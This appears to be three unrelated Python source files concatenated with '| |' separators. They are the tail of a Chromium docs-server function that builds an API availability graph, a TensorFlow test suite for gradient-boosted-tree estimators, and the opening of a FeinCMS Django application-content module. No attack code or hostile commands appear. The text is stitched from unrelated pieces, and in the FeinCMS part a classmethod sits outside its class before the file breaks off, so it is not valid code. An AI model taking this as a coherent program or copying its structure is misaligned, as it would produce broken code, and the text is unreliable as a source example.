  # Stat of the API's schema at trunk; the Ascending() walk below keeps
  # going until a version's stat matches it (no remaining differences).
  trunk_stat = assert_not_none(host_fs.Stat(self._GetApiSchemaFilename(
      api_name, host_fs, 'trunk')))

  # Weird object thing here because nonlocal is Python 3.
  previous = type('previous', (object,), {'stat': None, 'graph': None})

  def update_availability_graph(file_system, channel_info):
    # Callback invoked once per traversed version, starting at the API's
    # top-level availability (see GetApiAvailability).
    version_filename = assert_not_none(self._GetApiSchemaFilename(
        api_name, file_system, channel_info.version))
    version_stat = assert_not_none(file_system.Stat(version_filename))

    # Important optimisation: only re-parse the graph if the file changed in
    # the last revision. Parsing the same schema and forming a graph on every
    # iteration is really expensive.
    if version_stat == previous.stat:
      version_graph = previous.graph
    else:
      # Keep track of any new schema elements from this version by adding
      # them to |availability_graph|.
      #
      # Calling |availability_graph|.Lookup() on the nodes being updated
      # will return the |annotation| object -- the current |channel_info|.
      version_graph = APISchemaGraph(self._GetApiSchema(
          api_name, file_system, channel_info.version))
      availability_graph.Update(version_graph.Subtract(availability_graph),
                                annotation=channel_info)

    previous.stat = version_stat
    previous.graph = version_graph

    # Continue looping until there are no longer differences between this
    # version and trunk.
    return version_stat != trunk_stat

  self._file_system_iterator.Ascending(self.GetApiAvailability(api_name),
                                       update_availability_graph)

  self._node_level_object_store.Set(api_name, availability_graph)
  return availability_graph
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GBDT estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import numpy as np
from tensorflow.contrib.boosted_trees.estimator_batch import estimator
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.layers.python.layers import feature_column as contrib_feature_column
from tensorflow.contrib.learn.python.learn.estimators import run_config
from tensorflow.python.estimator.canned import head as head_lib
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column_lib as core_feature_column
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
from tensorflow.python.training import checkpoint_utils
def _train_input_fn():
  """Returns (features, labels) for the basic binary training set."""
  x_values = constant_op.constant([[2.], [1.], [1.]])
  labels = constant_op.constant([[1], [0], [0]], dtype=dtypes.int32)
  return {"x": x_values}, labels
def _multiclass_train_input_fn():
  """Returns (features, labels) for the three-class training set."""
  x_values = constant_op.constant(
      [[2.], [1.], [1.], [5.], [3.5], [4.6], [3.5]])
  labels = constant_op.constant(
      [[1], [0], [0], [2], [2], [0], [1]], dtype=dtypes.int32)
  return {"x": x_values}, labels
def _ranking_train_input_fn():
  """Returns (features, labels) for pairwise-ranking training.

  Feature keys are "<pair key>.<feature name>"; "a" and "b" are the two
  documents of each pair (see ranking_model_pair_keys in the tests).
  """
  pair_features = {
      "a.f1": constant_op.constant([[3.], [0.3], [1.]]),
      "a.f2": constant_op.constant([[0.1], [3.], [1.]]),
      "b.f1": constant_op.constant([[13.], [0.4], [5.]]),
      "b.f2": constant_op.constant([[1.], [3.], [0.01]]),
  }
  labels = constant_op.constant([[0], [0], [1]], dtype=dtypes.int32)
  return pair_features, labels
def _eval_input_fn():
  """Returns (features, labels) for evaluation/prediction."""
  labels = constant_op.constant([[0], [1], [1]], dtype=dtypes.int32)
  return {"x": constant_op.constant([[1.], [2.], [2.]])}, labels
def _infer_ranking_train_input_fn():
  """Returns features only (labels are None) for ranking inference."""
  inference_features = {
      "f1": constant_op.constant([[3.], [2], [1.]]),
      "f2": constant_op.constant([[0.1], [3.], [1.]])
  }
  return inference_features, None
# Number of examples generated for the quantile-regression tests.
_QUANTILE_REGRESSION_SIZE = 1000


def _quantile_regression_input_fns():
  """Builds train/test input fns for the quantile-regression tests.

  The data generation is taken from
  http://scikit-learn.org/stable/auto_examples/ensemble/plot_gradient_boosting_quantile.html
  i.e. y = x * sin(x) plus heteroscedastic noise.

  Returns:
    A (train_input_fn, test_input_fn, y) tuple where |y| holds the noisy
    float32 labels before reshaping to (N, 1).
  """
  np.random.seed(1)

  def target(values):
    """The function to predict."""
    return values * np.sin(values)

  # Training features, shaped (N, 1).
  x = np.atleast_2d(
      np.random.uniform(0, 10.0, size=_QUANTILE_REGRESSION_SIZE)).T
  x = x.astype(np.float32)

  # Labels with additive random noise.
  y = target(x).ravel()
  dy = 1.5 + 1.0 * np.random.random(y.shape)
  noise = np.random.normal(0, dy)
  y += noise
  y_original = y.astype(np.float32)
  y = y.reshape(_QUANTILE_REGRESSION_SIZE, 1)

  train_input_fn = numpy_io.numpy_input_fn(
      x=x,
      y=y,
      batch_size=_QUANTILE_REGRESSION_SIZE,
      num_epochs=None,
      shuffle=True)
  # Test on the training data to make sure the predictions are calibrated.
  test_input_fn = numpy_io.numpy_input_fn(
      x=x,
      y=y,
      batch_size=_QUANTILE_REGRESSION_SIZE,
      num_epochs=1,
      shuffle=False)
  return train_input_fn, test_input_fn, y_original
class BoostedTreeEstimatorTest(test_util.TensorFlowTestCase):
  """Smoke tests for the contrib (fit/evaluate/export) GBDT estimators."""

  def setUp(self):
    # Fresh export directory per test; export() writes SavedModels here.
    self._export_dir_base = tempfile.mkdtemp() + "export/"
    gfile.MkDir(self._export_dir_base)

  def _assert_checkpoint(self, model_dir, global_step):
    # Asserts that the global step recorded in the latest checkpoint under
    # |model_dir| equals |global_step|.
    reader = checkpoint_utils.load_checkpoint(model_dir)
    self.assertEqual(global_step, reader.get_tensor(ops.GraphKeys.GLOBAL_STEP))

  def testFitAndEvaluateDontThrowException(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[contrib_feature_column.real_valued_column("x")])

    classifier.fit(input_fn=_train_input_fn, steps=15)
    classifier.evaluate(input_fn=_eval_input_fn, steps=1)
    classifier.export(self._export_dir_base)

  def testThatLeafIndexIsInPredictions(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[contrib_feature_column.real_valued_column("x")],
        output_leaf_index=True)

    classifier.fit(input_fn=_train_input_fn, steps=15)
    result_iter = classifier.predict(input_fn=_eval_input_fn)
    # output_leaf_index=True must surface per-tree leaf ids alongside the
    # logits in every prediction dict.
    for prediction_dict in result_iter:
      self.assertTrue("leaf_index" in prediction_dict)
      self.assertTrue("logits" in prediction_dict)

  def testFitAndEvaluateDontThrowExceptionWithCoreForEstimator(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    # Use core head
    head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
        loss_reduction=losses.Reduction.SUM_OVER_BATCH_SIZE)

    model = estimator.GradientBoostedDecisionTreeEstimator(
        head=head_fn,
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")],
        use_core_libs=True)

    model.fit(input_fn=_train_input_fn, steps=15)
    model.evaluate(input_fn=_eval_input_fn, steps=1)
    model.export(self._export_dir_base)

  def testFitAndEvaluateDontThrowExceptionWithCoreForClassifier(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")],
        use_core_libs=True)

    classifier.fit(input_fn=_train_input_fn, steps=15)
    classifier.evaluate(input_fn=_eval_input_fn, steps=1)
    classifier.export(self._export_dir_base)

  def testFitAndEvaluateDontThrowExceptionWithCoreForRegressor(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    regressor = estimator.GradientBoostedDecisionTreeRegressor(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")],
        use_core_libs=True)

    regressor.fit(input_fn=_train_input_fn, steps=15)
    regressor.evaluate(input_fn=_eval_input_fn, steps=1)
    regressor.export(self._export_dir_base)

  def testRankingDontThrowExceptionForForEstimator(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
        loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)

    model = estimator.GradientBoostedDecisionTreeRanker(
        head=head_fn,
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        use_core_libs=True,
        feature_columns=[
            core_feature_column.numeric_column("f1"),
            core_feature_column.numeric_column("f2")
        ],
        # Pair keys "a"/"b" match the feature-name prefixes produced by
        # _ranking_train_input_fn.
        ranking_model_pair_keys=("a", "b"))

    model.fit(input_fn=_ranking_train_input_fn, steps=1000)
    model.evaluate(input_fn=_ranking_train_input_fn, steps=1)
    model.predict(input_fn=_infer_ranking_train_input_fn)

  def testDoesNotOverrideGlobalSteps(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 2
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[contrib_feature_column.real_valued_column("x")],
        output_leaf_index=False)

    classifier.fit(input_fn=_train_input_fn, steps=15)
    # When no override of global steps, 5 steps were used.
    self._assert_checkpoint(classifier.model_dir, global_step=5)

  def testOverridesGlobalSteps(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 2
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[contrib_feature_column.real_valued_column("x")],
        output_leaf_index=False,
        # The checkpointed global step must take this value verbatim.
        override_global_step_value=10000000)

    classifier.fit(input_fn=_train_input_fn, steps=15)
    self._assert_checkpoint(classifier.model_dir, global_step=10000000)

  def testFitAndEvaluateMultiClassTreePerClassDontThrowException(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 3
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.TREE_PER_CLASS)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        n_classes=learner_config.num_classes,
        num_trees=1,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        feature_columns=[contrib_feature_column.real_valued_column("x")])

    classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_eval_input_fn, steps=1)
    classifier.export(self._export_dir_base)
    result_iter = classifier.predict(input_fn=_eval_input_fn)
    for prediction_dict in result_iter:
      self.assertTrue("classes" in prediction_dict)

  def testFitAndEvaluateMultiClassDiagonalDontThrowException(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 3
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        n_classes=learner_config.num_classes,
        num_trees=1,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        center_bias=False,
        feature_columns=[contrib_feature_column.real_valued_column("x")])

    classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_eval_input_fn, steps=1)
    classifier.export(self._export_dir_base)
    result_iter = classifier.predict(input_fn=_eval_input_fn)
    for prediction_dict in result_iter:
      self.assertTrue("classes" in prediction_dict)

  def testFitAndEvaluateMultiClassFullDontThrowException(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 3
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.FULL_HESSIAN)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.GradientBoostedDecisionTreeClassifier(
        learner_config=learner_config,
        n_classes=learner_config.num_classes,
        num_trees=1,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        center_bias=False,
        feature_columns=[contrib_feature_column.real_valued_column("x")])

    classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_eval_input_fn, steps=1)
    classifier.export(self._export_dir_base)
    result_iter = classifier.predict(input_fn=_eval_input_fn)
    for prediction_dict in result_iter:
      self.assertTrue("classes" in prediction_dict)

  # One dimensional quantile regression.
  def testQuantileRegression(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 3
    learner_config.growing_mode = learner_pb2.LearnerConfig.WHOLE_TREE
    learner_config.constraints.min_node_weight = 1 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.l2 = 1.0 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.l1 = 1.0 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.tree_complexity = (
        1.0 / _QUANTILE_REGRESSION_SIZE)

    # NOTE(review): unlike the core variant of this test below, |y| is not
    # reshaped to (N, 1) before the comparisons, so |upper|/|lower| (lists
    # of shape-(1,) score arrays) broadcast against the flat |y| -- confirm
    # the intended shapes actually align elementwise.
    train_input_fn, test_input_fn, y = _quantile_regression_input_fns()

    # 95% percentile.
    model_upper = estimator.GradientBoostedDecisionTreeQuantileRegressor(
        quantiles=[0.95],
        learner_config=learner_config,
        num_trees=100,
        examples_per_layer=_QUANTILE_REGRESSION_SIZE,
        center_bias=False)

    model_upper.fit(input_fn=train_input_fn, steps=1000)
    result_iter = model_upper.predict(input_fn=test_input_fn)
    upper = []
    for prediction_dict in result_iter:
      upper.append(prediction_dict["scores"])

    frac_below_upper = round(1. * np.count_nonzero(upper > y) / len(y), 3)
    # +/- 3%
    self.assertTrue(frac_below_upper >= 0.92)
    self.assertTrue(frac_below_upper <= 0.98)

    train_input_fn, test_input_fn, _ = _quantile_regression_input_fns()

    # 5% percentile.
    model_lower = estimator.GradientBoostedDecisionTreeQuantileRegressor(
        quantiles=[0.05],
        learner_config=learner_config,
        num_trees=100,
        examples_per_layer=_QUANTILE_REGRESSION_SIZE,
        center_bias=False)

    model_lower.fit(input_fn=train_input_fn, steps=1000)
    result_iter = model_lower.predict(input_fn=test_input_fn)
    lower = []
    for prediction_dict in result_iter:
      lower.append(prediction_dict["scores"])

    frac_above_lower = round(1. * np.count_nonzero(lower < y) / len(y), 3)
    # +/- 3%
    self.assertTrue(frac_above_lower >= 0.92)
    self.assertTrue(frac_above_lower <= 0.98)
class CoreGradientBoostedDecisionTreeEstimators(test_util.TensorFlowTestCase):
  """Smoke tests for the core-estimator (train/evaluate) GBDT wrappers."""

  def testTrainEvaluateInferDoesNotThrowError(self):
    head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
        loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)

    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    est = estimator.CoreGradientBoostedDecisionTreeEstimator(
        head=head_fn,
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")])

    # Train for a few steps.
    est.train(input_fn=_train_input_fn, steps=1000)
    est.evaluate(input_fn=_eval_input_fn, steps=1)
    est.predict(input_fn=_eval_input_fn)

  def testRankingDontThrowExceptionForForEstimator(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
        loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)

    est = estimator.CoreGradientBoostedDecisionTreeRanker(
        head=head_fn,
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=[
            core_feature_column.numeric_column("f1"),
            core_feature_column.numeric_column("f2")
        ],
        # Pair keys "a"/"b" match the feature-name prefixes produced by
        # _ranking_train_input_fn.
        ranking_model_pair_keys=("a", "b"))

    # Train for a few steps.
    est.train(input_fn=_ranking_train_input_fn, steps=1000)
    est.evaluate(input_fn=_ranking_train_input_fn, steps=1)
    est.predict(input_fn=_infer_ranking_train_input_fn)

  def testFitAndEvaluateMultiClassTreePerClasssDontThrowException(self):
    n_classes = 3
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = n_classes
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.TREE_PER_CLASS)

    head_fn = estimator.core_multiclass_head(n_classes=n_classes)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
        learner_config=learner_config,
        head=head_fn,
        num_trees=1,
        center_bias=False,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")])

    classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
    classifier.predict(input_fn=_eval_input_fn)

  def testFitAndEvaluateMultiClassDiagonalDontThrowException(self):
    n_classes = 3
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = n_classes
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)

    head_fn = estimator.core_multiclass_head(n_classes=n_classes)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
        learner_config=learner_config,
        head=head_fn,
        num_trees=1,
        center_bias=False,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")])

    classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
    classifier.predict(input_fn=_eval_input_fn)

  def testFitAndEvaluateMultiClassFullDontThrowException(self):
    n_classes = 3
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = n_classes
    learner_config.constraints.max_tree_depth = 1
    learner_config.multi_class_strategy = (
        learner_pb2.LearnerConfig.FULL_HESSIAN)

    head_fn = estimator.core_multiclass_head(n_classes=n_classes)

    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    classifier = estimator.CoreGradientBoostedDecisionTreeEstimator(
        learner_config=learner_config,
        head=head_fn,
        num_trees=1,
        center_bias=False,
        examples_per_layer=7,
        model_dir=model_dir,
        config=config,
        feature_columns=[core_feature_column.numeric_column("x")])

    classifier.train(input_fn=_multiclass_train_input_fn, steps=100)
    classifier.evaluate(input_fn=_multiclass_train_input_fn, steps=1)
    classifier.predict(input_fn=_eval_input_fn)

  def testWeightedCategoricalColumn(self):
    head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
        loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)

    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 1
    model_dir = tempfile.mkdtemp()
    config = run_config.RunConfig()

    feature_columns = [
        core_feature_column.weighted_categorical_column(
            categorical_column=core_feature_column
            .categorical_column_with_vocabulary_list(
                key="word", vocabulary_list=["the", "cat", "dog"]),
            weight_feature_key="weight")
    ]

    labels = np.array([[1], [1], [0], [0.]], dtype=np.float32)

    def _make_input_fn():

      def _input_fn():
        features_dict = {}
        # Sparse tensor representing
        # example 0: "cat","the"
        # examaple 1: "dog"
        # example 2: -
        # example 3: "the"
        # Weights for the words are 5 - cat, 6- dog and 1 -the.
        features_dict["word"] = sparse_tensor.SparseTensor(
            indices=[[0, 0], [0, 1], [1, 0], [3, 0]],
            values=constant_op.constant(["the", "cat", "dog", "the"],
                                        dtype=dtypes.string),
            dense_shape=[4, 3])
        features_dict["weight"] = sparse_tensor.SparseTensor(
            indices=[[0, 0], [0, 1], [1, 0], [3, 0]],
            values=[1., 5., 6., 1.],
            dense_shape=[4, 3])
        return features_dict, labels

      return _input_fn

    est = estimator.CoreGradientBoostedDecisionTreeEstimator(
        head=head_fn,
        learner_config=learner_config,
        num_trees=1,
        examples_per_layer=3,
        model_dir=model_dir,
        config=config,
        feature_columns=feature_columns)

    input_fn = _make_input_fn()
    est.train(input_fn=input_fn, steps=100)
    est.evaluate(input_fn=input_fn, steps=1)
    est.predict(input_fn=input_fn)

  # One dimensional quantile regression.
  def testQuantileRegression(self):
    learner_config = learner_pb2.LearnerConfig()
    learner_config.num_classes = 2
    learner_config.constraints.max_tree_depth = 3
    learner_config.growing_mode = learner_pb2.LearnerConfig.WHOLE_TREE
    learner_config.constraints.min_node_weight = 1 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.l2 = 1.0 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.l1 = 1.0 / _QUANTILE_REGRESSION_SIZE
    learner_config.regularization.tree_complexity = (
        1.0 / _QUANTILE_REGRESSION_SIZE)

    train_input_fn, test_input_fn, y = _quantile_regression_input_fns()
    # Reshape so the (N, 1) predictions compare elementwise against y.
    y = y.reshape(_QUANTILE_REGRESSION_SIZE, 1)

    # 95% percentile.
    model_upper = estimator.CoreGradientBoostedDecisionTreeQuantileRegressor(
        quantiles=[0.95],
        learner_config=learner_config,
        num_trees=100,
        examples_per_layer=_QUANTILE_REGRESSION_SIZE,
        center_bias=False)

    model_upper.train(input_fn=train_input_fn, steps=1000)
    result_iter = model_upper.predict(input_fn=test_input_fn)
    upper = []
    for prediction_dict in result_iter:
      upper.append(prediction_dict["predictions"])

    frac_below_upper = round(1. * np.count_nonzero(upper > y) / len(y), 3)
    # +/- 3%
    self.assertTrue(frac_below_upper >= 0.92)
    self.assertTrue(frac_below_upper <= 0.98)

    train_input_fn, test_input_fn, _ = _quantile_regression_input_fns()

    # 5% percentile.
    model_lower = estimator.CoreGradientBoostedDecisionTreeQuantileRegressor(
        quantiles=[0.05],
        learner_config=learner_config,
        num_trees=100,
        examples_per_layer=_QUANTILE_REGRESSION_SIZE,
        center_bias=False)

    model_lower.train(input_fn=train_input_fn, steps=1000)
    result_iter = model_lower.predict(input_fn=test_input_fn)
    lower = []
    for prediction_dict in result_iter:
      lower.append(prediction_dict["predictions"])

    frac_above_lower = round(1. * np.count_nonzero(lower < y) / len(y), 3)
    # +/- 3%
    self.assertTrue(frac_above_lower >= 0.92)
    self.assertTrue(frac_above_lower <= 0.98)


if __name__ == "__main__":
  googletest.main()
| |
"""
Third-party application inclusion support.
"""
from __future__ import absolute_import, unicode_literals
from email.utils import parsedate
from time import mktime
from random import SystemRandom
import re
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import (
Resolver404, resolve, reverse, NoReverseMatch,
get_script_prefix, set_script_prefix,
)
from django.db import models
from django.db.models import signals
from django.http import HttpResponse
from django.template.response import TemplateResponse
from django.utils.functional import curry as partial, lazy, wraps
from django.utils.http import http_date
from django.utils.safestring import mark_safe
from django.utils.translation import get_language, ugettext_lazy as _
from feincms.admin.item_editor import ItemEditorForm
from feincms.contrib.fields import JSONField
from feincms.translations import short_language_code
from feincms.utils import get_object
APP_REVERSE_CACHE_GENERATION_KEY = 'FEINCMS:APPREVERSECACHE'
APP_REVERSE_CACHE_TIMEOUT = 300
class UnpackTemplateResponse(TemplateResponse):
    """
    Completely the same as marking applicationcontent-contained views with
    the ``feincms.views.decorators.unpack`` decorator.
    """
    # Flag checked by the application-content machinery (see
    # ApplicationContent.process / the unpack handling of 200 responses).
    _feincms_unpack = True
def cycle_app_reverse_cache(*args, **kwargs):
    """Invalidates all cached app_reverse() URL prefixes.

    The cache is not really emptied; instead a fresh random generation
    value is stored under ``APP_REVERSE_CACHE_GENERATION_KEY``.  That value
    is mixed into every cache key, which guarantees the cache does not yet
    contain entries for any of the newly generated keys.
    """
    generation = '%07x' % (SystemRandom().randint(0, 0x10000000))
    cache.set(APP_REVERSE_CACHE_GENERATION_KEY, generation)
    return generation


# Set the app_reverse_cache_generation value once per startup (at least).
# This protects us against offline modifications of the database.
cycle_app_reverse_cache()
def app_reverse(viewname, urlconf=None, args=None, kwargs=None,
                *vargs, **vkwargs):
    """
    Reverse URLs from application contents

    Works almost like Django's own reverse() method except that it resolves
    URLs from application contents. The second argument, ``urlconf``, has to
    correspond to the URLconf parameter passed in the ``APPLICATIONS`` list
    to ``Page.create_content_type``::

        app_reverse('mymodel-detail', 'myapp.urls', args=...)

    or

        app_reverse('mymodel-detail', 'myapp.urls', kwargs=...)

    The second argument may also be a request object if you want to reverse
    an URL belonging to the current application content.

    Raises ``NoReverseMatch`` if no matching application content exists.
    """
    # First parameter might be a request instead of an urlconf path, so
    # we'll try to be helpful and extract the current urlconf from it
    extra_context = getattr(urlconf, '_feincms_extra_context', {})
    appconfig = extra_context.get('app_config', {})
    urlconf = appconfig.get('urlconf_path', urlconf)

    appcontent_class = ApplicationContent._feincms_content_models[0]
    cache_key = appcontent_class.app_reverse_cache_key(urlconf)
    # Cached value is an (urlconf, page URL prefix) pair, or None on miss.
    url_prefix = cache.get(cache_key)

    if url_prefix is None:
        content = appcontent_class.closest_match(urlconf)
        if content is not None:
            if urlconf in appcontent_class.ALL_APPS_CONFIG:
                # We have an overridden URLconf
                app_config = appcontent_class.ALL_APPS_CONFIG[urlconf]
                urlconf = app_config['config'].get('urls', urlconf)

            # Ensure the page URL ends with a slash before using it as a
            # script prefix.
            prefix = content.parent.get_absolute_url()
            prefix += '/' if prefix[-1] != '/' else ''

            url_prefix = (urlconf, prefix)
            cache.set(cache_key, url_prefix, timeout=APP_REVERSE_CACHE_TIMEOUT)

    if url_prefix:
        # vargs and vkwargs are used to send through additional parameters
        # which are uninteresting to us (such as current_app)
        prefix = get_script_prefix()
        try:
            # Temporarily install the page's URL as the script prefix so
            # that reverse() produces URLs below the content's page, then
            # always restore the original prefix.
            set_script_prefix(url_prefix[1])
            return reverse(
                viewname,
                url_prefix[0],
                args=args,
                kwargs=kwargs,
                *vargs, **vkwargs)
        finally:
            set_script_prefix(prefix)

    raise NoReverseMatch("Unable to find ApplicationContent for %r" % urlconf)


#: Lazy version of ``app_reverse``
app_reverse_lazy = lazy(app_reverse, str)
def permalink(func):
    """
    Decorator that calls app_reverse()

    Use this instead of standard django.db.models.permalink if you want to
    integrate the model through ApplicationContent. The wrapped function
    must return 4 instead of 3 arguments::

        class MyModel(models.Model):
            @appmodels.permalink
            def get_absolute_url(self):
                return ('myapp.urls', 'model_detail', (), {'slug': self.slug})
    """
    @wraps(func)
    def inner(*args, **kwargs):
        # The wrapped function returns app_reverse()'s argument tuple.
        return app_reverse(*func(*args, **kwargs))
    return inner
# Splits an "<segment>/<segment>" identifier into its two slash-free parts.
APPLICATIONCONTENT_RE = re.compile(r'^([^/]+)/([^/]+)$')
class ApplicationContent(models.Model):
    #: parameters is used to serialize instance-specific data which will be
    # provided to the view code. This allows customization (e.g. "Embed
    # MyBlogApp for blog <slug>")
    parameters = JSONField(null=True, editable=False)

    # Mapping of URLconf path -> {'urls': ..., 'name': ..., 'config': ...};
    # populated by initialize_type() from the APPLICATIONS setting.
    ALL_APPS_CONFIG = {}

    class Meta:
        abstract = True
        verbose_name = _('application content')
        verbose_name_plural = _('application contents')
@classmethod
def initialize_type(cls, APPLICATIONS):
    # Validates the APPLICATIONS configuration, registers every entry in
    # cls.ALL_APPS_CONFIG, adds the 'urlconf_path' model field, builds the
    # item editor form class, and wires up cache-invalidation signals.
    for i in APPLICATIONS:
        if not 2 <= len(i) <= 3:
            raise ValueError(
                "APPLICATIONS must be provided with tuples containing at"
                " least two parameters (urls, name) and an optional extra"
                " config dict")

